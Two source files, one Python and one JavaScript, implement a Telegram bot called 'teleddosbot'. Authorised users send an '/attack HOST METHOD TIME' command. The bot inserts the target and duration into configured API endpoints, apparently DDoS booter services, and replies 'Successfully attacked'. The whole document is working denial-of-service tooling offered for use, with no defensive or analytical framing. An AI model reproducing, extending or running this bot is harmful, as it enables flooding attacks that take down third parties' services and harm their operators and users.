File: teleddosbot.py
import logging
import json
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
import requests

with open('config.json', 'r') as config_file:
    config = json.load(config_file)

bot_token = config["bot_token"]
allowed_user_ids = config["allowed_user_ids"]
available_methods = config["available_methods"]
api_endpoints = config["api_endpoints"]

def attack(update, context):
    if update.message.from_user.id not in allowed_user_ids:
        update.message.reply_text("You are not authorized to use this bot.")
        return
    user_input = update.message.text[len("/attack "):]
    user_input = user_input.split()
    if len(user_input) != 3:
        missing_params = []
        if len(user_input) == 0:
            missing_params.append("HOST")
        if len(user_input) <= 1:
            missing_params.append("METHOD")
        if len(user_input) <= 2:
            missing_params.append("TIME")
        missing_params_message = "Missing parameters: " + ", ".join(missing_params)
        update.message.reply_text(missing_params_message)
        return
    host, method, time = user_input
    if method not in available_methods:
        update.message.reply_text("Unknown method. Use /methods to see available methods.")
        return
    url = api_endpoints.get(method, "")
    if not url:
        update.message.reply_text("Method not supported.")
        return
    url = url.replace("{host}", host).replace("{time}", time)
    try:
        response = requests.get(url)
        if response.status_code == 200:
            attack_details = f"Succesfully attacked 🚀\nHost: {host}\nMethod: {method}\nTime: {time}"
            update.message.reply_text(attack_details)
        else:
            update.message.reply_text("Failed to send attack request.")
    except Exception as e:
        update.message.reply_text(f"Error: {str(e)}")

def show_methods(update, context):
    methods = "Available methods: " + ", ".join(available_methods)
    update.message.reply_text(methods)

def handle_message(update, context):
    update.message.reply_text("I don't understand this command. Use /attack {HOST} {METHOD} {TIME} or /methods for available methods.")

def main():
    updater = Updater(bot_token, use_context=True)
    dp = updater.dispatcher
    dp.add_handler(CommandHandler("attack", attack))
    dp.add_handler(CommandHandler("methods", show_methods))
    dp.add_handler(MessageHandler(Filters.text & ~Filters.command, handle_message))
    updater.start_polling()
    updater.idle()

if __name__ == "__main__":
    main()

File: teleddosbot.js
const TelegramBot = require('node-telegram-bot-api');
const request = require('request');
const fs = require('fs');

const config = JSON.parse(fs.readFileSync('config.json'));

const bot = new TelegramBot(config.bot_token, { polling: true });

const allowedUserIds = config.allowed_user_ids;
const availableMethods = config.available_methods;
const apiEndpoints = config.api_endpoints;

bot.onText(/\/attack (.+)/, (msg, match) => {
    const chatId = msg.chat.id;
    const userId = msg.from.id;

    if (!allowedUserIds.includes(userId)) {
        bot.sendMessage(chatId, "You are not authorized to use this bot.");
        return;
    }

    const user_input = match[1].split(' ');
    if (user_input.length !== 3) {
        const missing_params = [];
        if (user_input.length === 0) {
            missing_params.push("HOST");
        }
        if (user_input.length <= 1) {
            missing_params.push("METHOD");
        }
        if (user_input.length <= 2) {
            missing_params.push("TIME");
        }
        const missing_params_message = "Missing parameters: " + missing_params.join(', ');
        bot.sendMessage(chatId, missing_params_message);
        return;
    }

    const [host, method, time] = user_input;

    if (!availableMethods.includes(method)) {
        bot.sendMessage(chatId, "Unknown method. Use /methods to see available methods.");
        return;
    }

    const url = apiEndpoints[method];
    if (!url) {
        bot.sendMessage(chatId, "Method not supported.");
        return;
    }

    const formattedUrl = url.replace("{host}", host).replace("{time}", time);

    request(formattedUrl, (error, response, body) => {
        if (!error && response.statusCode == 200) {
            const attackDetails = `Successfully attacked 🚀\nHost: ${host}\nMethod: ${method}\nTime: ${time}`;
            bot.sendMessage(chatId, attackDetails);
        } else {
            bot.sendMessage(chatId, "Failed to send attack request.");
        }
    });
});

bot.onText(/\/methods/, (msg) => {
    const methods = "Available methods: " + availableMethods.join(', ');
    bot.sendMessage(msg.chat.id, methods);
});

bot.onText(/\/start|\/help/, (msg) => {
    bot.sendMessage(msg.chat.id, "Welcome to the Attack Bot! Use /attack {HOST} {METHOD} {TIME} to launch an attack or /methods to see available methods.");
});
